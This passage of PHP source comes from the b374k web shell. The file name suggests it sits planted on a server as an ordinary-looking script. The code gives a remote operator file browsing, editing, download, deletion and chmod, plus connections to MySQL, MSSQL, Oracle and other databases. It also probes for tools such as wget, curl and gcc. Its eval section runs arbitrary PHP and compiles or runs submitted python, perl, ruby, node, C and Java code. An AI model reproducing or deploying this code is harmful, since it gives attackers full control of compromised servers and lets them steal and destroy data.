                $s_laction = "<span id='" . cs($s_l) . "_'><a href='" . $s_self . "cd=" . pl($s_cwd . $s_l . DS) . "&find=" . pl($s_cwd . $s_l . DS) . "'>find</a> | <a href='" . $s_self . "cd=" . pl($s_cwd . $s_l . DS) . "&x=upload" . "'>upl</a> | <a href=\"javascript:tukar('" . cs($s_l) . "_','','rename','" . adds($s_l) . "','" . adds($s_l) . "');\">ren</a> | <a href='" . $s_self . "cd=" . pl($s_cwd) . "&del=" . pl($s_l) . "'>del</a></span><div id='" . cs($s_l) . "__form'></div>";
                $s_total_dir++;
            }
            $s_lname = "[ " . $s_l . " ]";
            $s_lsizetit = "0";
            $s_lnametit = "dir : " . $s_l;
        } else {
            $s_lhref = $s_self . "view=" . pl($s_cwd . $s_l);
            $s_lname = $s_l;
            $s_lsize = gs($s_l);
            $s_lsizetit = @filesize($s_l);
            $s_lnametit = "file : " . $s_l;
            $s_laction = "<span id='" . cs($s_l) . "_'><a href='" . $s_self . "edit=" . pl($s_cwd . $s_l) . "'>edit</a> | <a href='" . $s_self . "hexedit=" . pl($s_cwd . $s_l) . "'>hex</a> | <a href=\"javascript:tukar('" . cs($s_l) . "_','','rename','" . adds($s_l) . "','" . adds($s_l) . "');\">ren</a> | <a href='" . $s_self . "del=" . pl($s_cwd . $s_l) . "'>del</a> | <a href='" . $s_self . "dl=" . pl($s_cwd . $s_l) . "'>dl</a></span><div id='" . cs($s_l) . "__form'></div>";
            $s_total_file++;
        }
        $s_cboxval = $s_cwd . $s_l;
        if ($s_l == '.') {
            $s_cboxval = $s_cwd;
        }
        if ($s_l == '..') {
            $s_cboxval = $s_parent;
        }
        $s_cboxes_id = substr(md5($s_lhref), 0, 8);
        $s_cboxes = "<input id='" . $s_cboxes_id . "' name='cbox' value='" . hss($s_cboxval) . "' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='" . $s_cboxes_id . "' class='css-label'></label>";
        $s_ltime = filemtime($s_l);
        $s_buff .= "<tr><td style='text-align:center;text-indent:4px;'>" . $s_cboxes . "</td><td class='xpl' title='" . $s_lnametit . "' ondblclick=\"return go('" . adds($s_lhref) . "',event);\"><a href='" . $s_lhref . "'>" . $s_lname . "</a></td><td title='" . $s_lsizetit . "'>" . $s_lsize . "</td>" . $s_owner_html . "<td class='ce'>" . gp($s_l) . "</td><td class='ce' title='" . $s_ltime . "'>" . @date("d-M-Y H:i:s", $s_ltime) . "</td><td>" . $s_laction . "</td></tr>";
    }
    $s_buff .= "</tbody>";
    $s_extract = "";
    $s_compress = "";
    if (class_exists("ZipArchive")) {
        $s_extract = "<option value='extractzip'>extract (zip)</option>";
        $s_compress = "<option value='compresszip'>compress (zip)</option>";
    }
    if ($s_tar) {
        $s_extract .= "<option value='extracttar'>extract (tar)</option><option value='extracttargz'>extract (tar.gz)</option>";
        $s_compress .= "<option value='compresstar'>compress (tar)</option><option value='compresstargz'>compress (tar.gz)</option>";
    }
    $s_extcom = $s_extract != "" && $s_compress != "" ? $s_extract . "<option value='' disabled>-</option>" . $s_compress : $s_extract . $s_compress;
    $s_buff .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /> <label for='checkalll' class='css-label'></label></td><td><form action='" . $s_self . "' method='post'><select id='massact' class='inputzbut' onchange='massactgo();' style='width:100%;height:20px;margin:0;'><option value='' disabled selected>Action</option><option value='cut'>cut</option><option value='copy'>copy</option><option value='paste'>paste</option><option value='delete'>delete</option><option value='' disabled>-</option><option value='chmod'>chmod</option><option value='touch'>touch</option><option value='' disabled>-</option>" . $s_extcom . "</select><noscript><input type='button' value='Go !' class='inputzbut' onclick='massactgo();' /></noscript></form></td><td colspan='" . $s_colspan . "' style='text-align:left;'>Total : " . $s_total_file . " files, " . $s_total_dir . " Directories<span id='total_selected'></span></td></tr></tfoot></table>";
    return $s_buff;
}
//database related functions
function sql_connect($s_sqltype, $s_sqlhost, $s_sqluser, $s_sqlpass)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli')) {
            return new mysqli($s_sqlhost, $s_sqluser, $s_sqlpass);
        } elseif (function_exists('mysql_connect')) {
            return @mysql_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_connect')) {
            $s_coninfo = array("UID" => $s_sqluser, "PWD" => $s_sqlpass);
            return @sqlsrv_connect($s_sqlhost, $s_coninfo);
        } elseif (function_exists('mssql_connect')) {
            return @mssql_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
        }
    } elseif ($s_sqltype == 'pgsql') {
        $s_hosts = explode(":", $s_sqlhost);
        if (count($s_hosts) == 2) {
            $s_host_str = "host=" . $s_hosts[0] . " port=" . $s_hosts[1];
        } else {
            $s_host_str = "host=" . $s_sqlhost;
        }
        if (function_exists('pg_connect')) {
            return @pg_connect("{$s_host_str} user={$s_sqluser} password={$s_sqlpass}");
        }
    } elseif ($s_sqltype == 'oracle') {
        if (function_exists('oci_connect')) {
            return @oci_connect($s_sqluser, $s_sqlpass, $s_sqlhost);
        }
    } elseif ($s_sqltype == 'sqlite3') {
        if (class_exists('SQLite3')) {
            if (!empty($s_sqlhost)) {
                return new SQLite3($s_sqlhost);
            } else {
                return false;
            }
        }
    } elseif ($s_sqltype == 'sqlite') {
        if (function_exists('sqlite_open')) {
            return @sqlite_open($s_sqlhost);
        }
    } elseif ($s_sqltype == 'odbc') {
        if (function_exists('odbc_connect')) {
            return @odbc_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
        }
    } elseif ($s_sqltype == 'pdo') {
        if (class_exists('PDO')) {
            if (!empty($s_sqlhost)) {
                return new PDO($s_sqlhost, $s_sqluser, $s_sqlpass);
            } else {
                return false;
            }
        }
    }
    return false;
}
function sql_query($s_sqltype, $s_query, $s_con)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli')) {
            return $s_con->query($s_query);
        } elseif (function_exists('mysql_query')) {
            return mysql_query($s_query);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_query')) {
            return sqlsrv_query($s_con, $s_query);
        } elseif (function_exists('mssql_query')) {
            return mssql_query($s_query);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_query($s_query);
    } elseif ($s_sqltype == 'oracle') {
        return oci_execute(oci_parse($s_con, $s_query));
    } elseif ($s_sqltype == 'sqlite3') {
        return $s_con->query($s_query);
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_query($s_con, $s_query);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_exec($s_con, $s_query);
    } elseif ($s_sqltype == 'pdo') {
        return $s_con->query($s_query);
    }
}
function sql_num_rows($s_sqltype, $s_hasil)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli_result')) {
            return $s_hasil->mysqli_num_rows;
        } elseif (function_exists('mysql_num_rows')) {
            return mysql_num_rows($s_hasil);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_num_rows')) {
            return sqlsrv_num_rows($s_hasil);
        } elseif (function_exists('mssql_num_rows')) {
            return mssql_num_rows($s_hasil);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_num_rows($s_hasil);
    } elseif ($s_sqltype == 'oracle') {
        return oci_num_rows($s_hasil);
    } elseif ($s_sqltype == 'sqlite3') {
        $s_metadata = $s_hasil->fetchArray();
        if (is_array($s_metadata)) {
            return $s_metadata['count'];
        }
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_num_rows($s_hasil);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_num_rows($s_hasil);
    } elseif ($s_sqltype == 'pdo') {
        return $s_hasil->rowCount();
    }
}
function sql_num_fields($s_sqltype, $s_hasil)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli_result')) {
            return $s_hasil->field_count;
        } elseif (function_exists('mysql_num_fields')) {
            return mysql_num_fields($s_hasil);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_num_fields')) {
            return sqlsrv_num_fields($s_hasil);
        } elseif (function_exists('mssql_num_fields')) {
            return mssql_num_fields($s_hasil);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_num_fields($s_hasil);
    } elseif ($s_sqltype == 'oracle') {
        return oci_num_fields($s_hasil);
    } elseif ($s_sqltype == 'sqlite3') {
        return $s_hasil->numColumns();
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_num_fields($s_hasil);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_num_fields($s_hasil);
    } elseif ($s_sqltype == 'pdo') {
        return $s_hasil->columnCount();
    }
}
function sql_field_name($s_sqltype, $s_hasil, $s_i)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli_result')) {
            $z = $s_hasil->fetch_field();
            return $z->name;
        } elseif (function_exists('mysql_field_name')) {
            return mysql_field_name($s_hasil, $s_i);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_field_metadata')) {
            $s_metadata = sqlsrv_field_metadata($s_hasil);
            if (is_array($s_metadata)) {
                $s_metadata = $s_metadata[$s_i];
            }
            if (is_array($s_metadata)) {
                return $s_metadata['Name'];
            }
        } elseif (function_exists('mssql_field_name')) {
            return mssql_field_name($s_hasil, $s_i);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_field_name($s_hasil, $s_i);
    } elseif ($s_sqltype == 'oracle') {
        return oci_field_name($s_hasil, $s_i + 1);
    } elseif ($s_sqltype == 'sqlite3') {
        return $s_hasil->columnName($s_i);
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_field_name($s_hasil, $s_i);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_field_name($s_hasil, $s_i + 1);
    } elseif ($s_sqltype == 'pdo') {
        $s_res = $s_hasil->getColumnMeta($s_i);
        return $s_res['name'];
    }
}
function sql_fetch_data($s_sqltype, $s_hasil)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli_result')) {
            return $s_hasil->fetch_row();
        } elseif (function_exists('mysql_fetch_row')) {
            return mysql_fetch_row($s_hasil);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_fetch_array')) {
            return sqlsrv_fetch_array($s_hasil, 1);
        } elseif (function_exists('mssql_fetch_row')) {
            return mssql_fetch_row($s_hasil);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_fetch_row($s_hasil);
    } elseif ($s_sqltype == 'oracle') {
        return oci_fetch_row($s_hasil);
    } elseif ($s_sqltype == 'sqlite3') {
        return $s_hasil->fetchArray(1);
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_fetch_array($s_hasil, 1);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_fetch_array($s_hasil);
    } elseif ($s_sqltype == 'pdo') {
        return $s_hasil->fetch(2);
    }
}
function sql_close($s_sqltype, $s_con)
{
    if ($s_sqltype == 'mysql') {
        if (class_exists('mysqli')) {
            return $s_con->close();
        } elseif (function_exists('mysql_close')) {
            return mysql_close($s_con);
        }
    } elseif ($s_sqltype == 'mssql') {
        if (function_exists('sqlsrv_close')) {
            return sqlsrv_close($s_con);
        } elseif (function_exists('mssql_close')) {
            return mssql_close($s_con);
        }
    } elseif ($s_sqltype == 'pgsql') {
        return pg_close($s_con);
    } elseif ($s_sqltype == 'oracle') {
        return oci_close($s_con);
    } elseif ($s_sqltype == 'sqlite3') {
        return $s_con->close();
    } elseif ($s_sqltype == 'sqlite') {
        return sqlite_close($s_con);
    } elseif ($s_sqltype == 'odbc') {
        return odbc_close($s_con);
    } elseif ($s_sqltype == 'pdo') {
        return $s_con = null;
    }
}
if (!function_exists('str_split')) {
    function str_split($s_t, $s_s = 1)
    {
        $s_a = array();
        for ($s_i = 0; $s_i < strlen($s_t);) {
            $s_a[] = substr($s_t, $s_i, $s_s);
            $s_i += $s_s;
        }
        return $s_a;
    }
}
// appearance
$s_theme = "dark";
// default is dark
if (isset($_COOKIE['theme'])) {
    $s_theme = $_COOKIE['theme'];
}
if (isset($_GP['x']) && $_GP['x'] == 'switch') {
    if (isset($_COOKIE['theme'])) {
        $s_theme = $_COOKIE['theme'];
    }
    if ($s_theme == "bright") {
        $s_theme = "dark";
    } else {
        $s_theme = "bright";
    }
    setcookie("theme", $s_theme, time() + $s_login_time);
}
$s_highlight_dark = array("4C9CAF", "888888", "87DF45", "EEEEEE", "FF8000");
$s_highlight_bright = array("B36350", "777777", "7820BA", "111111", "007FFF");
global $s_self, $s_win, $s_posix;
$s_self = "?";
$s_cek1 = basename($_SERVER['SCRIPT_FILENAME']);
$s_cek2 = substr(basename("/var/www/html/rtxcat.php.1600f663598a442047f92454eaa6bdd3.bin"), 0, strlen($s_cek1));
if (isset($_COOKIE['b374k_included'])) {
    if (strcmp($s_cek1, $s_cek2) != 0) {
        $s_self = $_COOKIE['s_self'];
    } else {
        $s_self = "?";
        setcookie("b374k_included", "0", time() - $s_login_time);
        setcookie("s_self", $s_self, time() + $s_login_time);
    }
} else {
    if (strcmp($s_cek1, $s_cek2) != 0) {
        if (!isset($_COOKIE['s_home'])) {
            $s_home = "?" . $_SERVER["QUERY_STRING"] . "&";
            setcookie("s_home", $s_home, time() + $s_login_time);
        }
        if (isset($s_home)) {
            $s_self = $s_home;
        } elseif (isset($_COOKIE['s_home'])) {
            $s_self = $_COOKIE['s_home'];
        }
        setcookie("b374k_included", "1", time() + $s_login_time);
        setcookie("s_self", $s_self, time() + $s_login_time);
    } else {
        $s_self = "?";
        setcookie("b374k_included", "0", time() - $s_login_time);
        setcookie("s_self", $s_self, time() + $s_login_time);
    }
}
$s_cwd = "";
if (isset($_GP['|'])) {
    showcode($s_css);
} elseif (isset($_GP['!'])) {
    showcode($s_js);
}
if ($s_auth) {
    // server software
    $s_software = getenv("SERVER_SOFTWARE");
    // uname -a
    $s_system = php_uname();
    // check os
    $s_win = strtolower(substr($s_system, 0, 3)) == "win" ? true : false;
    // check for posix
    $s_posix = function_exists("posix_getpwuid") ? true : false;
    // change working directory
    if (isset($_GP['cd'])) {
        $s_dd = $_GP['cd'];
        if (@is_dir($s_dd)) {
            $s_cwd = cp($s_dd);
            chdir($s_cwd);
            setcookie("cwd", $s_cwd, time() + $s_login_time);
        } else {
            $s_cwd = isset($_COOKIE['cwd']) ? cp($_COOKIE['cwd']) : cp(getcwd());
        }
    } else {
        if (isset($_COOKIE['cwd'])) {
            $s_dd = ss($_COOKIE['cwd']);
            if (@is_dir($s_dd)) {
                $s_cwd = cp($s_dd);
                chdir($s_cwd);
            }
        } else {
            $s_cwd = cp(getcwd());
        }
    }
    if (!$s_win && $s_posix) {
        $s_userarr = posix_getpwuid(posix_geteuid());
        if (isset($s_userarr['name'])) {
            $s_user = $s_userarr['name'];
        } else {
            $s_user = "\$";
        }
    } else {
        $s_user = get_current_user();
    }
    // prompt style
    $s_prompt = $s_user . " &gt;";
    // server ip
    $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
    // your ip ;-)
    $s_my_ip = $_SERVER['REMOTE_ADDR'];
    $s_result = "";
    global $s_python, $s_perl, $s_ruby, $s_node, $s_nodejs, $s_gcc, $s_java, $s_javac, $s_tar, $s_wget, $s_lwpdownload, $s_lynx, $s_curl;
    $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
    foreach ($s_access as $s) {
        if (isset($_COOKIE[$s])) {
            ${$s} = $_COOKIE[$s];
        } else {
            if (!isset($_COOKIE['b374k'])) {
                $t = explode("_", $s);
                $t = check_access($t[1]);
                if ($t !== false) {
                    ${$s} = $t;
                    setcookie($s, ${$s}, time() + $s_login_time);
                }
            }
        }
    }
    // download file specified by ?dl=<file>
    if (isset($_GP['dl']) && $_GP['dl'] != "") {
        ob_end_clean();
        $f = $_GP['dl'];
        $fc = fgc($f);
        header("Content-type: application/octet-stream");
        header("Content-length: " . strlen($fc));
        header("Content-disposition: attachment; filename=\"" . basename($f) . "\";");
        echo $fc;
        die;
    }
    // massact
    if (isset($_GP['z'])) {
        $s_massact = isset($_COOKIE['massact']) ? $_COOKIE['massact'] : "";
        $s_buffer = isset($_COOKIE['buffer']) ? rtrim(ss($_COOKIE['buffer']), "|") : "";
        $s_lists = explode("|", $s_buffer);
        $s_counter = 0;
        if (!empty($s_buffer)) {
            if ($_GP['z'] == 'moveok') {
                foreach ($s_lists as $s_l) {
                    if (rename($s_l, $s_cwd . basename($s_l))) {
                        $s_counter++;
                    }
                }
                if ($s_counter > 0) {
                    $s_result .= notif($s_counter . " items moved");
                } else {
                    $s_result .= notif("No items moved");
                }
            } elseif ($_GP['z'] == 'copyok') {
                foreach ($s_lists as $s_l) {
                    if (@is_dir($s_l)) {
                        copys($s_l, $s_cwd . basename($s_l));
                        if (file_exists($s_cwd . basename($s_l))) {
                            $s_counter++;
                        }
                    } elseif (@is_file($s_l)) {
                        copy($s_l, $s_cwd . basename($s_l));
                        if (file_exists($s_cwd . basename($s_l))) {
                            $s_counter++;
                        }
                    }
                }
                if ($s_counter > 0) {
                    $s_result .= notif($s_counter . " items copied");
                } else {
                    $s_result .= notif("No items copied");
                }
            } elseif ($_GP['z'] == 'delok') {
                foreach ($s_lists as $s_l) {
                    if (@is_file($s_l)) {
                        if (unlink($s_l)) {
                            $s_counter++;
                        }
                    } elseif (@is_dir($s_l)) {
                        rmdirs($s_l);
                        if (!file_exists($s_l)) {
                            $s_counter++;
                        }
                    }
                }
                if ($s_counter > 0) {
                    $s_result .= notif($s_counter . " items deleted");
                } else {
                    $s_result .= notif("No items deleted");
                }
            } elseif (isset($_GP['chmodok'])) {
                $s_mod = octdec($_GP['chmodok']);
                foreach ($s_lists as $s_l) {
                    if (chmod($s_l, $s_mod)) {
                        $s_counter++;
                    }
                }
                if ($s_counter > 0) {
                    $s_result .= notif($s_counter . " items changed mode to " . decoct($s_mod));
                } else {
                    $s_result .= notif("No items modified");
                }
            } elseif (isset($_GP['touchok'])) {
                $s_datenew = strtotime($_GP['touchok']);
                foreach ($s_lists as $s_l) {
                    if (touch($s_l, $s_datenew)) {
                        $s_counter++;
                    }
                }
                if ($s_counter > 0) {
                    $s_result .= notif($s_counter . " items changed access and modification time to " . @date("d-M-Y H:i:s", $s_datenew));
                } else {
                    $s_result .= notif("No items modified");
                }
            } elseif (isset($_GP['compresszipok'])) {
                $s_file = $_GP['compresszipok'];
                if (zip($s_lists, $s_file)) {
                    $s_result .= notif("Archive created : " . hss($s_file));
                } else {
                    $s_result .= notif("Error creating archive file");
                }
            } elseif (isset($_GP['compresstarok'])) {
                $s_lists_ = array();
                $s_file = $_GP['compresstarok'];
                $s_file = basename($s_file);
                $s_lists__ = array_map("basename", $s_lists);
                $s_lists_ = array_map("pf", $s_lists__);
                exe("tar cf \"" . $s_file . "\" " . implode(" ", $s_lists_));
                if (@is_file($s_file)) {
                    $s_result .= notif("Archive created : " . hss($s_file));
                } else {
                    $s_result .= notif("Error creating archive file");
                }
            } elseif (isset($_GP['compresstargzok'])) {
                $s_lists_ = array();
                $s_file = $_GP['compresstargzok'];
                $s_file = basename($s_file);
                $s_lists__ = array_map("basename", $s_lists);
                $s_lists_ = array_map("pf", $s_lists__);
                exe("tar czf \"" . $s_file . "\" " . implode(" ", $s_lists_));
                if (@is_file($s_file)) {
                    $s_result .= notif("Archive created : " . hss($s_file));
                } else {
                    $s_result .= notif("Error creating archive file");
                }
            } elseif (isset($_GP['extractzipok'])) {
                $s_file = $_GP['extractzipok'];
                $zip = new ZipArchive();
                foreach ($s_lists as $f) {
                    $s_target = $s_file . basename($f, ".zip");
                    if ($zip->open($f)) {
                        if (!@is_dir($s_target)) {
                            @mkdir($s_target);
                        }
                        if ($zip->extractTo($s_target)) {
                            $s_result .= notif("Files extracted to " . hss($s_target));
                        } else {
                            $s_result .= notif("Error extrating archive file");
                        }
                        $zip->close();
                    } else {
                        $s_result .= notif("Error opening archive file");
                    }
                }
            } elseif (isset($_GP['extracttarok'])) {
                $s_file = $_GP['extracttarok'];
                foreach ($s_lists as $f) {
                    $s_target = "";
                    $s_target = basename($f, ".tar");
                    if (!@is_dir($s_target)) {
                        @mkdir($s_target);
                    }
                    exe("tar xf \"" . basename($f) . "\" -C \"" . $s_target . "\"");
                }
            } elseif (isset($_GP['extracttargzok'])) {
                $s_file = $_GP['extracttargzok'];
                foreach ($s_lists as $f) {
                    $s_target = "";
                    if (strpos(strtolower($f), ".tar.gz") !== false) {
                        $s_target = basename($f, ".tar.gz");
                    } elseif (strpos(strtolower($f), ".tgz") !== false) {
                        $s_target = basename($f, ".tgz");
                    }
                    if (!@is_dir($s_target)) {
                        @mkdir($s_target);
                    }
                    exe("tar xzf \"" . basename($f) . "\" -C \"" . $s_target . "\"");
                }
            }
        }
        setcookie("buffer", "", time() - $s_login_time);
        setcookie("massact", "", time() - $s_login_time);
    }
    if (isset($_GP['y'])) {
        $s_massact = isset($_COOKIE['massact']) ? $_COOKIE['massact'] : "";
        $s_buffer = isset($_COOKIE['buffer']) ? rtrim(ss($_COOKIE['buffer']), "|") : "";
        $s_lists = explode("|", $s_buffer);
        if (!empty($s_buffer)) {
            if ($_GP['y'] == 'delete') {
                $s_result .= notif("Delete ? <a href='" . $s_self . "z=delok" . "'>Yes</a> | <a href='" . $s_self . "'>No</a>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'paste' && $s_massact == 'cut') {
                $s_result .= notif("Move here ? <a href='" . $s_self . "z=moveok" . "'>Yes</a> | <a href='" . $s_self . "'>No</a>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'paste' && $s_massact == 'copy') {
                $s_result .= notif("Copy here ? <a href='" . $s_self . "z=copyok" . "'>Yes</a> | <a href='" . $s_self . "'>No</a>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'chmod') {
                $s_result .= notif("Permissions ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='0755' name='chmodok' style='width:30px;text-align:center;' maxlength='4' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'touch') {
                $s_result .= notif("Touch ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . @date("d-M-Y H:i:s", time()) . "' name='touchok' style='width:130px;text-align:center;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'extractzip') {
                $s_result .= notif("Extract to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . "' name='extractzipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'extracttar') {
                $s_result .= notif("Extract to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . "' name='extracttarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'extracttargz') {
                $s_result .= notif("Extract to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . "' name='extracttargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'compresszip') {
                $s_result .= notif("Compress to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . substr(md5(time()), 0, 8) . ".zip' name='compresszipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'compresstar') {
                $s_result .= notif("Compress to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . substr(md5(time()), 0, 8) . ".tar' name='compresstarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            } elseif ($_GP['y'] == 'compresstargz') {
                $s_result .= notif("Compress to ? <form action='" . $s_self . "' method='post'><input class='inputz' type='text' value='" . hss($s_cwd) . substr(md5(time()), 0, 8) . ".tar.gz' name='compresstargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
                foreach ($s_lists as $s_l) {
                    $s_result .= notif($s_l);
                }
            }
        }
    }
    // view image specified by ?img=<file>
    if (isset($_GP['img'])) {
        ob_end_clean();
        $s_d = isset($_GP['d']) ? $_GP['d'] : "";
        $s_f = $_GP['img'];
        $s_inf = @getimagesize($s_d . $s_f);
        $s_ext = explode($s_f, ".");
        $s_ext = $s_ext[count($s_ext) - 1];
        header("Content-type: " . $s_inf["mime"]);
        header("Cache-control: public");
        header("Expires: " . @date("r", @mktime(0, 0, 0, 1, 1, 2030)));
        header("Cache-control: max-age=604800");
        #
        readfile($s_d . $s_f);
        die;
    } elseif (isset($_GP['oldname']) && isset($_GP['rename'])) {
        $s_old = $_GP['oldname'];
        $s_new = $_GP['rename'];
        $s_renmsg = "";
        if (@is_dir($s_old)) {
            $s_renmsg = @rename($s_old, $s_new) ? "Directory " . $s_old . " renamed to " . $s_new : "Unable to rename directory " . $s_old . " to " . $s_new;
        } elseif (@is_file($s_old)) {
            $s_renmsg = @rename($s_old, $s_new) ? "File " . $s_old . " renamed to " . $s_new : "Unable to rename file " . $s_old . " to " . $s_new;
        } else {
            $s_renmsg = "Cannot find the path specified " . $s_old;
        }
        $s_result .= notif($s_renmsg);
        $s_fnew = $s_new;
    } elseif (!empty($_GP['del'])) {
        $s_del = trim($_GP['del']);
        $s_result .= notif("Delete " . basename($s_del) . " ? <a href='" . $s_self . "delete=" . pl($s_del) . "'>Yes</a> | <a href='" . $s_self . "'>No</a>");
    } elseif (!empty($_GP['delete'])) {
        $s_f = $_GP['delete'];
        $s_delmsg = "";
        if (@is_file($s_f)) {
            $s_delmsg = unlink($s_f) ? "File removed : " . $s_f : "Unable to remove file " . $s_f;
        } elseif (@is_dir($s_f)) {
            rmdirs($s_f);
            $s_delmsg = @is_dir($s_f) ? "Unable to remove directory " . $s_f : "Directory removed : " . $s_f;
        } else {
            $s_delmsg = "Cannot find the path specified " . $s_f;
        }
        $s_result .= notif($s_delmsg);
    } elseif (!empty($_GP['mkdir'])) {
        $s_f = $s_cwd . $_GP['mkdir'];
        $s_dirmsg = "";
        $s_num = 1;
        if (@is_dir($s_f)) {
            $s_pos = strrpos($s_f, "_");
            if ($s_pos !== false) {
                $s_num = (int) substr($s_f, $s_pos + 1);
            }
            while (@is_dir(substr($s_f, 0, $s_pos) . "_" . $s_num)) {
                $s_num++;
            }
            $s_f = substr($s_f, 0, $s_pos) . "_" . $s_num;
        }
        if (mkdir($s_f)) {
            $s_dirmsg = "Directory created " . $s_f;
        } else {
            $s_dirmsg = "Unable to create directory " . $s_f;
        }
        $s_result .= notif($s_dirmsg);
    }
    // php eval() function
    if (isset($_GP['x']) && $_GP['x'] == 'eval') {
        $s_code = "";
        $s_res = "";
        $s_evaloption = "";
        $s_lang = "php";
        if (isset($_GP['evalcode'])) {
            $s_code = $_GP['evalcode'];
            $s_evaloption = isset($_GP['evaloption']) ? $_GP['evaloption'] : "";
            $s_tmpdir = get_writabledir();
            if (isset($_GP['lang'])) {
                $s_lang = $_GP['lang'];
            }
            if (strtolower($s_lang) == 'php') {
                ob_start();
                eval($s_code);
                $s_res = ob_get_contents();
                ob_end_clean();
            } elseif (strtolower($s_lang) == 'python' || strtolower($s_lang) == 'perl' || strtolower($s_lang) == 'ruby' || strtolower($s_lang) == 'node' || strtolower($s_lang) == 'nodejs') {
                $s_rand = md5(time() . rand(0, 100));
                $s_script = $s_tmpdir . $s_rand;
                if (file_put_contents($s_script, $s_code) !== false) {
                    $s_res = exe($s_lang . " " . $s_evaloption . " " . $s_script);
                    unlink($s_script);
                }
            } elseif (strtolower($s_lang) == 'gcc') {
                $s_script = md5(time() . rand(0, 100));
                chdir($s_tmpdir);
                if (file_put_contents($s_script . ".c", $s_code) !== false) {
                    $s_scriptout = $s_win ? $s_script . ".exe" : $s_script;
                    $s_res = exe("gcc " . $s_script . ".c -o " . $s_scriptout . $s_evaloption);
                    if (@is_file($s_scriptout)) {
                        $s_res = $s_win ? exe($s_scriptout) : exe("chmod +x " . $s_scriptout . " ; ./" . $s_scriptout);
                        rename($s_scriptout, $s_scriptout . "del");
                        unlink($s_scriptout . "del");
                    }
                    unlink($s_script . ".c");
                }
                chdir($s_cwd);
            } elseif (strtolower($s_lang) == 'java') {
                if (preg_match("/class\\ ([^{]+){/i", $s_code, $s_r)) {
                    $s_classname = trim($s_r[1]);
                    $s_script = $s_classname;
                } else {
                    $s_rand = "b374k_" . substr(md5(time() . rand(0, 100)), 0, 8);
                    $s_script = $s_rand;
                    $s_code = "class " . $s_rand . " { " . $s_code . " } ";
                }
                chdir($s_tmpdir);
                if (file_put_contents($s_script . ".java", $s_code) !== false) {
                    $s_res = exe("javac " . $s_script . ".java");
                    if (@is_file($s_script . ".class")) {
                        $s_res .= exe("java " . $s_evaloption . " " . $s_script);
                        unlink($s_script . ".class");
                    }
                    unlink($s_script . ".java");
                }
                chdir($s_pwd);
            }
